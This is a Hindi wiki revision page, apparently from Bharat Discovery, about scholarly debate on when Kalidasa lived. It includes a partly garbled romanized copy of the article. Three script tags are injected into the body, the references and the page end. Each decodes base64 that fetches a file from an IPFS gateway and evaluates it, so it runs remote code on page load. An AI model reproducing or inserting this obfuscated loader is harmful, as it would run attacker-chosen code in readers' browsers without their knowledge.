Difference between revisions of "कालिदास का समय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
Line 10: Line 10:
 
इसके अतिरिक्त कालिदास के सम्बन्ध में जो जानकारी प्राप्त की जा सकती है, वह उनकी रचनाओं में जहाँ-तहाँ बिखरे हुए विभिन्न वर्णनों से निष्कर्ष निकालकर प्राप्त की गई है। यह जानकारी अपूर्ण तो है ही, साथ ही अनिश्चित भी है। उदाहरण के लिए केवल इतना जान लेने से कि [[कालिदास]] पहली शताब्दी ईस्वी - पूर्व से लेकर ईसा के बाद चौथी शताब्दी तक की अवधि में हुए थे और या तो वे [[उज्जैन]]के रहने वाले थे या [[कश्मीर]] के या [[हिमालय]] के किसी पार्वत्य प्रदेश के, पाठक के मन को कुछ भी संतोष नहीं हो पाता। इस प्रकार के निष्कर्ष निकालने के लिए विद्वानों ने जो प्रमाण उपस्थित किए हैं, वे बहुत जगह विश्वासोत्पादक नहीं है और कई जगह तो उपहासास्पद भी बन गए हैं। फिर भी उन विद्वानों का श्रम व्यर्थ गया, नहीं समझा जा सकता, जिन्होंने इस प्रकार के प्रयत्न द्वारा कालिदास के स्थान और काल का निर्धारण करने का प्रयास किया है। अन्धेरे में टटोलने वाले और ग़लत दिशा में बढ़ने वाले लोग भी एक महत्त्वपूर्ण लक्ष्य को पूर्ण करने में सहायक होते हैं, क्योंकि वे चरम अज्ञान और निष्क्रियता की दशा से आगे बढ़ने का प्रयास करते हैं।
 
इसके अतिरिक्त कालिदास के सम्बन्ध में जो जानकारी प्राप्त की जा सकती है, वह उनकी रचनाओं में जहाँ-तहाँ बिखरे हुए विभिन्न वर्णनों से निष्कर्ष निकालकर प्राप्त की गई है। यह जानकारी अपूर्ण तो है ही, साथ ही अनिश्चित भी है। उदाहरण के लिए केवल इतना जान लेने से कि [[कालिदास]] पहली शताब्दी ईस्वी - पूर्व से लेकर ईसा के बाद चौथी शताब्दी तक की अवधि में हुए थे और या तो वे [[उज्जैन]]के रहने वाले थे या [[कश्मीर]] के या [[हिमालय]] के किसी पार्वत्य प्रदेश के, पाठक के मन को कुछ भी संतोष नहीं हो पाता। इस प्रकार के निष्कर्ष निकालने के लिए विद्वानों ने जो प्रमाण उपस्थित किए हैं, वे बहुत जगह विश्वासोत्पादक नहीं है और कई जगह तो उपहासास्पद भी बन गए हैं। फिर भी उन विद्वानों का श्रम व्यर्थ गया, नहीं समझा जा सकता, जिन्होंने इस प्रकार के प्रयत्न द्वारा कालिदास के स्थान और काल का निर्धारण करने का प्रयास किया है। अन्धेरे में टटोलने वाले और ग़लत दिशा में बढ़ने वाले लोग भी एक महत्त्वपूर्ण लक्ष्य को पूर्ण करने में सहायक होते हैं, क्योंकि वे चरम अज्ञान और निष्क्रियता की दशा से आगे बढ़ने का प्रयास करते हैं।
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक=|पूर्णता=|शोध=}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 05:40, 9 August 2012

kalidas vikramadity ki sabha ke navarat़hnoan mean se ek the. isaka adhar 'jyotirvidabharan' ka yah shlok hai -

dhanvantarikshapanakamarasianhashakurvetalabhattan ghatakharparakalidasa:.
khyato varahamihiro nripate: sabhayaan rat़hnani vai vararuchirnav vikramasy॥

kalidas ke samay ke vishay mean vidvanoan ke alag alag mat haian, kiantu kalidas ke samay ke vishay mean ek tathy prakash mean aya hai, jisaka shrey 'd aau. ekant bihari' ko hai. unake prakashit lekh ke anusar -

prapt tathy

ujjayini se kuchh doori par bhairavagadh namak sthan se mili huee kshipra nadi ke pas do shilakhand mile haian, in par kalidas se sambandhit kuchh lekh aankit haian. in shilakhandoan ka adhyayan karane se jnat hota hai ki 'kalidas avanti desh mean utpann hue the aur unaka samay shuang raja agnimitr se lekar vikramadity tak raha hoga.' is shilalekh se itana hi jnat hota hai ki yah shilalekh maharaj vikram ki ajna se harisvami namak kisi adhikari ke adesh se khudavaya gaya tha.

shilalekhoan par likhe hue shlok

shilalekhoan par likhe hue shlokoan ka bhav yah hai ki mahakavi kalidas avanti mean utpann hue tatha vahaan vidisha nam ki nagari mean shuang putr agnimitr dvara inaka samman kiya gaya tha. inhoanne rritusanhar, meghadoot, malavikagnimitr, raghuvansh, abhijnanashakuntalam, vikramorvashiy tatha kumarasambhav – in sat granthoan ki rachana ki thi. mahakavi ne apane jivan ka antim samay maharaj vikramark (vikramadity) ke ashray mean vyatit kiya tha. krit sanvat ke ant mean tatha vikram sanvat ke prarambh mean kartik shukla ekadashi, ravivar ke din 95 varsh ki ayu mean inaki mrityu huee. kalidas ka samay eesa poorv 56 varsh manana adhik uchit hoga.[1]

any janakari

isake atirikt kalidas ke sambandh mean jo janakari prapt ki ja sakati hai, vah unaki rachanaoan mean jahaan-tahaan bikhare hue vibhinn varnanoan se nishkarsh nikalakar prapt ki gee hai. yah janakari apoorn to hai hi, sath hi anishchit bhi hai. udaharan ke lie keval itana jan lene se ki kalidas pahali shatabdi eesvi - poorv se lekar eesa ke bad chauthi shatabdi tak ki avadhi mean hue the aur ya to ve ujjainke rahane vale the ya kashmir ke ya himalay ke kisi parvaty pradesh ke, pathak ke man ko kuchh bhi santosh nahian ho pata. is prakar ke nishkarsh nikalane ke lie vidvanoan ne jo praman upasthit kie haian, ve bahut jagah vishvasotpadak nahian hai aur kee jagah to upahasaspad bhi ban ge haian. phir bhi un vidvanoan ka shram vyarth gaya, nahian samajha ja sakata, jinhoanne is prakar ke prayatn dvara kalidas ke sthan aur kal ka nirdharan karane ka prayas kiya hai. andhere mean tatolane vale aur galat disha mean badhane vale log bhi ek mahattvapoorn lakshy ko poorn karane mean sahayak hote haian, kyoanki ve charam ajnan aur nishkriyata ki dasha se age badhane ka prayas karate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. saptahik hindustan, 18 aktoobar, 1964 (hindi).<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>